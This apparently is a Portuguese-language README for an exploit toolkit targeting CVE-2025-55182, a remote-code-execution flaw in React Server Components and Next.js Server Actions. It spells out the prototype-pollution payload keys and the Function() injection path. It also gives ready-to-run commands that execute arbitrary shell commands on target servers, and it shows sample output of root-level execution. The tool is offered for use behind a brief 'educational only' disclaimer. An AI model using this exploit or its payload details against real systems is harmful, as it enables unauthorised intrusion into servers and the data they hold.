
CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface
Exploit de execução remota de código e scanner completos para CVE-2025-55182 em React/Next.js Server Actions.
PoC Original: Spritualkb/CVE-2025-55182-exp
CVE-2025-55182 é uma vulnerabilidade crítica de poluição de protótipo em React Server Components que permite execução remota de código. Este repositório fornece tanto ferramentas de varredura automatizada (template Nuclei) quanto de exploração manual (script Python).
Mecanismo da Vulnerabilidade:
O exploit explora a poluição de protótipo na desserialização do React Flight Protocol. Ele polui Object.prototype.then através de "$1:__proto__:then" e obtém acesso ao construtor de Functions através de _formData.get definido como "$1:constructor:constructor", depois injeta código malicioso via _prefix que é executado por Function().
cve-2025-55182.yaml)Scanner automatizado de vulnerabilidades que executa o comando id e recupera a saída através do cabeçalho X-Action-Redirect.
Uso:
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml
Funcionalidades:
id) para verificar RCECVE-2025-55182.py)Script de exploit RCE completo que executa comandos arbitrários e recupera a saída.
Uso:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
Funcionalidades:
X-Action-Redirect$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Varredura concluída em 28.35483ms. 1 correspondência encontrada.
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"
============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================
[*] Alvo: http://localhost:3001
[*] Comando: id
[*] Construindo payload...
[*] Enviando payload do exploit...
============================================================
[+] Comando executado com sucesso!
============================================================
[+] Saída do Comando:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------
============================================================
[*] Tentativa de exploração concluída
============================================================
APENAS PARA FINS EDUCACIONAIS E TESTES AUTORIZADOS